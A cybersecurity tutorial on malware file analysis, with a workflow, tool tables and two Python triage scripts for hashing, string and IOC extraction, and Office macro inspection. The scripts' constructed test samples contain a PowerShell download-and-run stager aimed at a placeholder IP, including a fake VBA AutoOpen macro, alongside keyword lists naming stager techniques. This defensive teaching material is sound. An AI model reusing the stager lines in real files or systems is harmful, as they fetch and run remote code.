🗂️ How to Perform File Analysis in Cybersecurity
File analysis is the process of inspecting, extracting, and evaluating files to identify malicious behaviour, hidden content, or security policy violations. This is a fundamental skill in threat detection, malware investigation, and digital forensics.
🧠 Why File Analysis Matters
| Use Case | Why It's Important |
|---|---|
| Malware Detection | Uncover viruses, trojans, or droppers disguised as legitimate files. |
| Incident Response | Understand what a malicious file did post-infection. |
| Threat Hunting | Discover suspicious binaries or scripts across an estate. |
| Compliance | Validate file contents for DLP or policy violations. |
🧰 Tools for File Analysis
| Tool | Purpose |
|---|---|
| VirusTotal | Hash- or file-based scanning across dozens of AV engines, with community and sandbox context. |
| Any.Run / Joe Sandbox | Dynamic behavioural analysis of malware in a sandbox. |
| YARA | Pattern-matching tool to classify files by malware family or traits. |
| BinText / ExifTool | Extract strings, metadata, hidden content. |
| pefile / Detect It Easy (DIE) | Portable Executable (PE) structure analysis; DIE also identifies compilers and packers. |
| Python / PowerShell | Custom scripts for decoding or unpacking. |
| CAPE / Cuckoo Sandbox | Host your own malware sandbox with network monitoring. |
🔍 Static vs Dynamic Analysis
| Type | Description | When to Use |
|---|---|---|
| Static Analysis | Inspect file content without executing it: metadata, strings, hashes, structure. | First stage: quick and safe. |
| Dynamic Analysis | Run the file in an isolated environment and observe behaviour (e.g. registry edits, C2 calls). | When static analysis is inconclusive, e.g. because the sample is packed or obfuscated. |
🧪 Step-by-Step File Analysis Workflow
🔒 1. Isolate the File
- Store it in a secure, non-networked VM or container.
- Move and share it only inside a password-protected `.zip` archive (the conventional password is `infected`) to avoid accidental detonation and to stop endpoint AV quarantining it in transit.
🔎 2. Calculate Hashes
```bash
sha256sum suspicious_file.exe
```
- Search VirusTotal, Hybrid Analysis, etc. by hash before considering an upload: a hash lookup discloses nothing beyond the digest, whereas uploading shares the file with the service and its customers, which matters if the file may contain internal data.
🧬 3. Perform Static Analysis
- Use tools like `strings`, ExifTool, or `pefile` to inspect:
  - Suspicious strings (e.g. URLs, Base64 blobs, IPs)
  - Metadata (e.g. author, compile time)
  - File structure anomalies (e.g. magic bytes that do not match the extension, oddly named or oversized PE sections)
⚙️ 4. Perform Dynamic Analysis
- Upload to Any.Run, Joe Sandbox, or run in a local sandbox. A clean run is not proof of benign behaviour: malware commonly checks for sandbox artefacts or waits out the analysis window before acting.
- Monitor:
- File modifications
- Registry changes
- Outbound connections
- Process tree
🧰 5. Scan with AV / Threat Intel
- Upload to VirusTotal or scan offline with tools like:
  - ClamAV
  - Windows Defender (via `MpCmdRun.exe -Scan -ScanType 3 -File <path>`)
  - CrowdStrike or SentinelOne (enterprise)
📜 6. Match with YARA Rules
```bash
yara -s malware_rules.yar suspicious_file.exe
```
- `-s` prints the matched strings and their offsets, which is what you record as evidence. Use rules from threat-intel sharing platforms (e.g. MISP) or community rule repositories, or write your own. Sigma rules describe log events, not files, so they belong in the SIEM rather than in this step.
📝 7. Document Findings
- Capture indicators of compromise (IOCs): hashes, IPs, domains.
- Note TTPs (MITRE techniques) if behaviour was observed.
- Classify file (e.g. Dropper → Cobalt Strike beacon → ransomware).
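Steps 2, 3 and 7 of this workflow as one script, plus the double-extension check from the safety tips. This is an added example, not code from the original article: it uses only the Python standard library, the magic-byte and API watchlists are small illustrative subsets, and `SAMPLE_BYTES` is a constructed stand-in with a fake PE header and planted strings rather than a real sample (203.0.113.10 and example.invalid are documentation values). It goes slightly beyond the text by decoding base64 blobs and extracting IOCs from the decoded text as well.

```python
"""Static triage of one suspicious file: hashes, type vs extension, strings, IOCs.
Added example, not the article's code; standard library only. SAMPLE_BYTES is a
constructed stand-in (fake PE header plus planted strings), not a real sample."""
import base64, binascii, hashlib, re
from dataclasses import dataclass
from pathlib import PurePath

MAGIC = {  # leading bytes -> file type (illustrative subset)
    b"MZ": "PE executable", b"\x7fELF": "ELF executable", b"%PDF": "PDF document",
    b"PK\x03\x04": "ZIP container (OOXML, JAR, APK)",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "OLE compound document",
}
EXPECTED_EXT = {  # extensions that legitimately carry each type
    "PE executable": {".exe", ".dll", ".sys", ".scr"}, "PDF document": {".pdf"},
    "ZIP container (OOXML, JAR, APK)": {".zip", ".docx", ".docm", ".xlsx", ".xlsm", ".jar", ".apk"},
    "OLE compound document": {".doc", ".xls", ".ppt", ".msg"},
}
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".hta", ".lnk", ".ps1"}
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
SUSPICIOUS_APIS = {"VirtualAlloc", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
                   "URLDownloadToFileA", "WinExec", "ShellExecuteA", "IsDebuggerPresent"}
ASCII_RUN = re.compile(rb"[\x20-\x7e]{4,}")
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")  # wide strings, common in Windows binaries
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")  # also matches version numbers; review hits
B64_RE = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")

@dataclass
class TriageReport:  # the record that goes into the analyst's notes (step 7)
    filename: str
    hashes: dict
    detected_type: str
    extension_mismatch: bool
    double_extension: bool
    suspicious_apis: list
    decoded_base64: list
    iocs: dict

def file_hashes(data: bytes) -> dict:
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256")}

def detect_type(data: bytes) -> str:
    return next((name for magic, name in MAGIC.items() if data.startswith(magic)), "unknown")

def extension_mismatch(filename: str, detected_type: str) -> bool:
    """True when the content type is known and the extension does not fit it."""
    expected = EXPECTED_EXT.get(detected_type)
    return expected is not None and PurePath(filename).suffix.lower() not in expected

def has_double_extension(filename: str) -> bool:
    """invoice.pdf.exe: a document-looking extension in front of an executable one."""
    suffixes = [s.lower() for s in PurePath(filename).suffixes]
    return len(suffixes) >= 2 and suffixes[-1] in EXEC_EXTS and suffixes[-2] in DOC_EXTS

def extract_strings(data: bytes) -> list:
    """Printable ASCII runs and UTF-16LE runs of four or more characters."""
    return ([m.decode("ascii") for m in ASCII_RUN.findall(data)]
            + [m.decode("utf-16-le") for m in UTF16_RUN.findall(data)])

def decode_base64_blobs(strings: list) -> list:
    """Base64 runs that decode to printable text: hidden commands, URLs, stagers."""
    decoded = []
    for blob in (b for s in strings for b in B64_RE.findall(s)):
        try:
            raw = base64.b64decode(blob, validate=True)
        except (binascii.Error, ValueError):
            continue  # wrong length or padding: not base64
        if raw and all(0x20 <= c < 0x7F for c in raw):  # binary output is not a hidden command
            decoded.append(raw.decode("ascii"))
    return decoded

def extract_iocs(strings: list) -> dict:
    text = "\n".join(strings)
    return {"urls": sorted(set(URL_RE.findall(text))), "ipv4": sorted(set(IPV4_RE.findall(text)))}

def triage(filename: str, data: bytes) -> TriageReport:
    detected = detect_type(data)
    strings = extract_strings(data)
    decoded = decode_base64_blobs(strings)
    return TriageReport(filename, file_hashes(data), detected, extension_mismatch(filename, detected),
                        has_double_extension(filename), sorted(SUSPICIOUS_APIS.intersection(strings)),
                        decoded, extract_iocs(strings + decoded))  # IOCs behind base64 count too

# Constructed sample: fake PE header, API names, a C2 URL, a wide-string URL and a
# base64-encoded PowerShell stager. Not real malware; 203.0.113.10 is a documentation address.
_STAGER = b"powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s')\""
SAMPLE_BYTES = (b"MZ\x90\x00" + b"\x00" * 60 + b"This program cannot be run in DOS mode.\r\n\x00"
                + b"kernel32.dll\x00VirtualAlloc\x00CreateRemoteThread\x00"
                + b"http://203.0.113.10/update.bin\x00\x00"
                + "https://example.invalid/gate.php".encode("utf-16-le") + b"\x00\x00"
                + base64.b64encode(_STAGER) + b"\x00")

if __name__ == "__main__":
    import json
    print(json.dumps(triage("invoice.pdf", SAMPLE_BYTES).__dict__, indent=2))
```

Run it as a script to print the report as JSON, or call `triage(name, data)` from a larger pipeline. The hash and type checks are exact; the string, IPv4 and base64 heuristics produce false positives (version numbers, long identifiers), so treat their output as leads for the YARA and dynamic stages, not as verdicts.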
⚠️ Safety Tips
- Always analyse in offline, sandboxed environments
- Do not double-click unknown files, even if they look benign (e.g. `.pdf.exe`, where the visible "extension" is just part of the name)
- Take a VM snapshot before analysis and revert to it afterwards; keep the evidence store on a read-only mount
📂 Real-World Example
An email attachment `invoice.docm` was flagged by the EDR.
- Hash matched a known Emotet dropper in VirusTotal
- Static: contained macros with a PowerShell stager
- Dynamic: contacted a C2 server and downloaded a TrickBot payload
- Action: blocked the domain, disabled the user account, initiated IR
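What the static step of this case looks like in code: checking whether an OOXML attachment such as `invoice.docm` is macro-enabled and whether its VBA part carries stager-style keywords. This is an added example, not the article's code or the tooling used in the incident. It uses only the Python standard library; the `.docm` it builds is a constructed stand-in whose `word/vbaProject.bin` is plain text with planted keywords rather than a real compressed VBA project (reading real ones takes olefile/oletools), and the keyword list and `MAX_MEMBER_BYTES` cap are illustrative choices.

```python
"""Static checks on a macro-enabled Office (OOXML) attachment such as invoice.docm.
Added example, not the article's code; standard library only. The .docm built here
is a constructed stand-in: its vbaProject.bin is plain text with planted keywords,
not a real (compressed) VBA project, which needs olefile/oletools to read."""
import io
import zipfile

MACRO_CONTENT_TYPES = (
    "application/vnd.ms-word.document.macroEnabled.main+xml",
    "application/vnd.ms-excel.sheet.macroEnabled.main+xml",
    "application/vnd.ms-powerpoint.presentation.macroEnabled.main+xml",
    "application/vnd.ms-office.vbaProject",
)
# Keywords that point at auto-executing macros or a download-and-run stager (illustrative list).
MACRO_KEYWORDS = ("AutoOpen", "Document_Open", "Workbook_Open", "Auto_Open", "WScript.Shell",
                  "Shell(", "CreateObject", "powershell", "DownloadString", "-EncodedCommand",
                  "URLDownloadToFile")
MAX_MEMBER_BYTES = 20 * 1024 * 1024  # refuse to inflate oversized members (zip bombs)


def inspect_ooxml(data: bytes) -> dict:
    """Macro indicators for an OOXML file held in memory; {} if it is not a zip at all."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return {}
    report = {"macro_content_types": [], "vba_parts": [], "keyword_hits": {}, "skipped_members": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        report["vba_parts"] = [n for n in zf.namelist() if n.lower().endswith("vbaproject.bin")]
        for info in zf.infolist():
            if info.file_size > MAX_MEMBER_BYTES:
                report["skipped_members"].append(info.filename)
                continue
            blob = zf.read(info.filename)
            if info.filename == "[Content_Types].xml":
                text = blob.decode("utf-8", errors="replace")
                report["macro_content_types"] = [ct for ct in MACRO_CONTENT_TYPES if ct in text]
            hits = [kw for kw in MACRO_KEYWORDS if kw.lower().encode() in blob.lower()]
            if hits:
                report["keyword_hits"][info.filename] = hits
    return report


def macro_verdict(report: dict) -> str:
    """Turn the indicators into a triage label for the analyst's notes."""
    if not report:
        return "not an OOXML/zip container"
    if report["vba_parts"] or report["macro_content_types"]:
        return "macro-enabled: suspicious" if report["keyword_hits"] else "macro-enabled: review macros"
    return "no macros found"


def build_sample_docm(with_macro: bool = True) -> bytes:
    """Constructed invoice.docm stand-in; with_macro=False yields a plain .docx-style file."""
    main_ct = ("application/vnd.ms-word.document.macroEnabled.main+xml" if with_macro
               else "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml")
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        f'<Override PartName="/word/document.xml" ContentType="{main_ct}"/>'
        + ('<Override PartName="/word/vbaProject.bin" '
           'ContentType="application/vnd.ms-office.vbaProject"/>' if with_macro else "")
        + "</Types>"
    )
    document_xml = ("<w:document><w:body><w:p><w:t>Please enable content to view this invoice."
                    "</w:t></w:p></w:body></w:document>")
    # Planted, uncompressed "macro source"; 203.0.113.10 is a documentation address.
    fake_vba = (b'Attribute VB_Name = "ThisDocument"\r\nSub AutoOpen()\r\n'
                b'  CreateObject("WScript.Shell").Run "powershell -nop -w hidden -c '
                b"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/s')\"\r\nEnd Sub\r\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", document_xml)
        if with_macro:
            zf.writestr("word/vbaProject.bin", fake_vba)
    return buf.getvalue()


if __name__ == "__main__":
    indicators = inspect_ooxml(build_sample_docm())
    print(macro_verdict(indicators), indicators)
```

Treat the keyword hits as leads, not a verdict: real VBA is stored compressed inside `vbaProject.bin`, so on a genuine sample you decompress it first (e.g. with olevba) and then apply the same keyword logic to the recovered source. A macro-enabled content type or a `vbaProject.bin` part with no hits still deserves a look, which is why the verdict separates "review macros" from "suspicious".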